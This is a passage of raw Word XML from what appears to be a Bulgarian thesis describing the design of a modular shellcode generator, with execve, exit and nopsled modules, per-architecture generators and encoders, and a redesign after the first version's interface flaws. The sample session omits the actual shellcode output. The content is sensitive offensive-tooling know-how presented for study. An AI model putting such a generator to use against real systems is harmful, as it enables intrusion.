      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">Модул </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>execve</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Така се създава възможност за слабо запознат потребител да добавя свой модул. Например, ако на него му трябва модул fork, какъвто не е наличен, то той може да напише съотвения асемблер и с минимални усилия да го пригоди за употреба от инструмента</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Дизайнът на всеки модул е прозрачен, като предоставя механизми за изследване на вътрешната му работа - потребителят може да види самия код на </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>модула чрез команда inspect в режим gen. Това се постига чрез стандартен интерфейс дефиниран в класа BaseModule.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>За да се постигне поддръжка на множество архитектури, всички модули се разделят в python пакети, които представляват папки с представка името на архитектурата. Поради специфики между архитектурите от типа на точен синтаксис на асемблера и стартови символи, всяка архитектура има единствен генератор. Неговата цел е да държи в себе си всички модули и да извършва всички действия, необходими при финалното комбиниране на модулите, специфични за целевата архитектурата. Техният интерфейс е още по-прост, състоящ се от един необходим метод и е дефиниран в BaseGenerator.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Много сходни механизми се предоставят и за модули за тестване.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="120" w:name="_sky72k7esb0a" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="121" w:name="_Toc3540797"/>
      <w:bookmarkEnd w:id="120"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Инструменти</w:t>
      </w:r>
      <w:bookmarkEnd w:id="121"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Малък набор от инструменти за обединяване на средата за разработване. Такива са htons, деасемблиране, “two’s complement” превръщане и подобни. По време на дебъгване с gdb например, е удобно да може да се изследват такива преобразувания. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="122" w:name="_u7uixcbc3fvq" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="123" w:name="_Toc3540798"/>
      <w:bookmarkEnd w:id="122"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Максимална</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> свобода и параметризация</w:t>
      </w:r>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Целта е да се даде максимална свобода на потребителя - той трябва да може да комбинира всяко действие с всяко друго, стига това да има смисъл. Затова е необходимо всеки параметър, който би повлиял на действието на един шелкод да бъде достъпен от потребителя. Това налага необходимостта всяка команда да изисква определен набор от аргументи, които потребителят ръчно да избира.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="_my3lklvgljf6" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="125" w:name="_Toc3540799"/>
      <w:bookmarkEnd w:id="124"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Недостатъци</w:t>
      </w:r>
      <w:bookmarkEnd w:id="125"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Първоначално тази визия за функционалността изглеждаше като перфектното решение и разработката</w:t>
      </w:r>
      <w:r w:rsidRPr="00326004">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ѝ</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> вървеше с много обещаващо темпо. Този идеал бързо започна да се топи и темпото на разработка драстично се забави, когато оставаше последният елемент от пъзела - кодиране на готовия шелкод. Това се случи заради дълбоки недостатъци на философията за пълна свобода, </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>чието стриктно следване доведе до скован дизайн, който трудно подлежи на промяна. Освен това интерфейсът се оказа труден за употреба за крайния потребител. Към комит 613a714, беше ясно, че трябва да бъдат направени сериозни промени. Основните проблеми са:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Многословие на интерфейса</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Потребителят всеки път трябва да изпише всяка команда и всички параметри, ако има такива. Необходимо е отделно запознаване с всяка команда с друга команда help, което е лош и неинтуитивен интерфейсен дизайн. Макар че това може да бъде заобиколено чрез автоматично допълване, подсказки за употреба и история, същността на проблема не се елиминира.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Например за незапознат потребител една примерна сесия би изглеждала така:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>python automation/tool.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>&gt; gen amd64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>&gt;&gt; help</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Supported commands: globals, add, list, inspect, preview, build, save, clear</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>&gt;&gt; list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Supported modules: execve, exit, nopsled</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>&gt;&gt; add execve</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>&gt;&gt; add exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>&gt;&gt; build</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>.global _start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>.text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>[пропуснат шелкод изход]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>&gt;&gt; ^D</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>&gt; build amd64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>&gt;&lt; help</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Supported commands: globals, asm, disasm, extract, compile, link, run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Use 'help [cmd]' for help on each one</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>&gt;&lt; asm !raw_shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>saved to "/tmp/tool/output.o"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00303E70">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:bookmarkStart w:id="126" w:name="_Ref2190716"/>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>: Примерна сесия на първата версия на разработвания инструмент</w:t>
      </w:r>
      <w:bookmarkEnd w:id="126"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Интерфейсът не подлежи на промяна</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00C61194">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00567E8F">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Недостатък на изпълнението - централизацията на събирането на потребителския вход означава, че всяка една команда получава само преработените аргументи. Това е удобно от гледна точка на абстракция, но изключително неудобно при реализацията на специален потребителски вход. </w:t>
      </w:r>
      <w:r w:rsidRPr="00567E8F">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Няма ясен механизъм за предаване на подсказки и стойности по подразбиране от командите към</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> централното място, а съобщения за грешки трябва да се връщат с изключения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Глобални променливи</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Освен че отново са лошо решение от гледна точка на потребителското преживяване (user experience), при тяхната разработка са твърде чести бъгове. Различните компоненти използват различно представяне на данните и механизмът за глобалност трябва да реши тези противоречия. Това много бързо прераства в неочаквани грешки при малки промени на представянето на данните. В допълнение към всичко това някои команди пазят изхода си в глобалните променливи, но това е неконсистентно и трудно се известява на потребителя - например build от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref2190716 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>: Примерна сесия на първата версия на разработвания инструмент</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="127" w:name="_e8hl55jqnst6" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="128" w:name="_Toc3540800"/>
      <w:bookmarkEnd w:id="127"/>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Втора </w:t>
      </w:r>
      <w:r w:rsidRPr="008227E1">
        <w:t>версия</w:t>
      </w:r>
      <w:bookmarkEnd w:id="128"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Основната промяна за решаване на недостатъците е промяна на философията за пълна свобода. След стъпка назад и анализ на очакваните начини на употреба се оказва, че потребителят не се нуждае от пълна свобода, а точно обратното. Функционалностите на инструмента водят потребителя до няколко основни пътища на употреба, които са като пътеки, през които човек минава всеки път в зависимост от целите си. Те могат да се изразят в следната диаграма, чийто прототип</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">е наличен в </w:t>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:t>приложение 4</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:bookmarkStart w:id="129" w:name="_Ref2190781"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>+----------+                      preview          exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>| generate |           +---------  module            ^</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+----------+           |              ^              |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |                |              |              |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      v                v              |              |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   select           select            |          ask for</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    arch --------&gt;  module  ----------+           bytes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                       |                             ^</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                       |                             |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                       v                             |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                 preview text                     select</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      +--------&gt;   assembly                        arch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |                |                             ^</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |                |                             |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |                v                      +-------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |           export to    +-&gt;  exit      | disassemble |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |             binary     |              +-------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |                |       |                     ^</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |                |       |                     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |                v       |                     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   select           extract  --+                     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  encoder   &lt;-----   bytes   ------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      ^                      --+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |                |       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |                |       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      |                v       |</w:t>
      </w:r>
    </w:p>
